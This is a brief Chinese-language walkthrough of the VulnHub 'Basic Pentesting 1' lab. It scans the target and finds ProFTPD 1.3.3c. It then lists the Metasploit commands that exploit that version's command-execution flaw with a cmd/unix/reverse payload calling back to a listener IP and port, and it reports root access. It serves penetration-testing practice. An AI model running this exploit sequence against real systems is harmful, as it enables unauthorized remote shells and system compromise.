一、配置靶机
1、靶机下载地址
https://www.vulnhub.com/entry/basic-pentesting-1,216/
2、配置网卡
二、Web渗透
1、靶机IP扫描
发现开放了21、22、80端口
2、对靶机IP进行主机发现和端口扫描
根据nmap的扫描结果发现ftp的版本为ProFTPD 1.3.3c
,使用searchsploit工具搜索该版本的历史漏洞,发现存在命令执行漏洞
三、漏洞利用
1、利用工具msfconsole扫描可利用的漏洞
search ProFTPD 1.3.3c #搜索对应漏洞
use 0 #进入进漏洞版本
show options #查看需要配置的条件(yes前头为空的)
set RHOSTS 192.168.31.143 #配置靶机地址
set payload cmd/unix/reverse #配置payload
show options #查看需要配置的条件
set lhost 192.168.31.128 #配置监听的IP
set lport 5555 #配置监听的端口
run #开始测试
成功获取root权限
提权成功!!!